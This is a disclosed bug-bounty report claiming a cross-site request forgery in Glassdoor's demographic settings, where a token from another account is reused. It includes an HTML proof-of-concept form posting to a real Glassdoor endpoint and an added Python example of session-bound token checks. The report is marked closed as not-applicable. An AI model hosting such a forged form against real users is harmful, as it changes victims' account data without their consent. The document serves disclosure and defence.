CSRF in Demographic Settings with valid gdtoken of other account

Disclosed: 2021-04-16 02:46:30 By turb0h4x To glassdoor
Severity: Low

Vulnerability Details

Hi Security Team, I found a CSRF in account settings, exactly in the Demographic section, that leads to changing birth year and gender.

Steps to reproduce:

1. Create 2 accounts:
   * [email protected]
   * [email protected]
2. Log in with the attacker account, go to Demographic settings, and change gender and birth year.
3. Start Burp and turn on Intercept.
4. Capture the request and send it to Repeater.
5. Generate a CSRF PoC:

```html
<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
    <script>history.pushState('', '', '/')</script>
    <form action="https://www.glassdoor.com/member/account/settings_changeUserInformation.htm" method="POST">
      <input type="hidden" name="newGender" value="FEMALE" />
      <input type="hidden" name="birthYear" value="1940" />
      <input type="hidden" name="highestEducation" value="HIGH&#95;SCHOOL" />
      <!-- gdToken taken from the attacker's own session, not the victim's -->
      <input type="hidden" name="gdToken" value="Attacker token" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
```

* Host this HTML code.
* Now, log in to the victim account.
* Click Submit; birth year and gender will be changed.

## Impact

Changing Demographic settings of users.
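The report's premise is that the server accepted a `gdToken` issued to a different account. The defence is to bind the anti-CSRF token to the requesting user's session so that a token valid for one session is rejected for another. The following is an added illustration, not Glassdoor's code and not from the reporter: the `gdToken` name and the form field names are taken from the report, while the session identifiers, `SERVER_SECRET`, the `ISSUED_TOKENS` registry and the handler are assumptions constructed for the example. `validate_token_unbound` models the flawed pattern the report implies (any token the server ever issued passes); `validate_token_bound` is the per-session check.

```python
import hashlib
import hmac
import secrets

# Constructed for the example: in a real service this comes from a secret store.
SERVER_SECRET = secrets.token_bytes(32)

# Models a flawed design: a global registry of every token the server has issued.
ISSUED_TOKENS: set[str] = set()


def issue_csrf_token(session_id: str) -> str:
    """Derive a CSRF token bound to one session (HMAC over the session id)."""
    token = hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()
    ISSUED_TOKENS.add(token)  # only needed to demonstrate the weak check below
    return token


def validate_token_unbound(submitted_token: str) -> bool:
    """Weak check: accepts any token the server issued, regardless of whose session."""
    return submitted_token in ISSUED_TOKENS


def validate_token_bound(session_id: str, submitted_token: str) -> bool:
    """Correct check: recompute the token for *this* session and compare in constant time."""
    expected = issue_csrf_token(session_id)
    return hmac.compare_digest(expected, submitted_token)


def handle_change_user_information(session_id: str, form: dict) -> tuple[int, dict]:
    """Hypothetical handler for settings_changeUserInformation.htm using the bound check."""
    if not validate_token_bound(session_id, form.get("gdToken", "")):
        # Token may be valid for some other account; it is not valid for this one.
        return 403, {"error": "CSRF token does not belong to this session"}
    # Only fields the report mentions; real code would validate each value.
    updated = {k: form[k] for k in ("newGender", "birthYear", "highestEducation") if k in form}
    return 200, {"updated": updated}


def demo() -> dict:
    """Walk through the scenario from the report: attacker token replayed against the victim."""
    attacker_token = issue_csrf_token("attacker-session")
    victim_token = issue_csrf_token("victim-session")
    forged_form = {
        "newGender": "FEMALE",
        "birthYear": "1940",
        "highestEducation": "HIGH_SCHOOL",
        "gdToken": attacker_token,
    }
    status_unbound = 200 if validate_token_unbound(forged_form["gdToken"]) else 403
    status_bound, _ = handle_change_user_information("victim-session", forged_form)
    status_legit, _ = handle_change_user_information(
        "victim-session", {**forged_form, "gdToken": victim_token}
    )
    return {"unbound": status_unbound, "bound": status_bound, "legit": status_legit}


if __name__ == "__main__":
    print(demo())  # {'unbound': 200, 'bound': 403, 'legit': 200}
```

The bound check needs no server-side token table at all: the token is recomputed from the session id on every request, so it cannot be transplanted between accounts. Pairing it with `SameSite` cookies gives defence in depth, but the session binding is what closes the gap this report describes.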
Report Stats
  • Report ID: 1092849
  • State: Closed
  • Substate: not-applicable
  • Upvotes: 3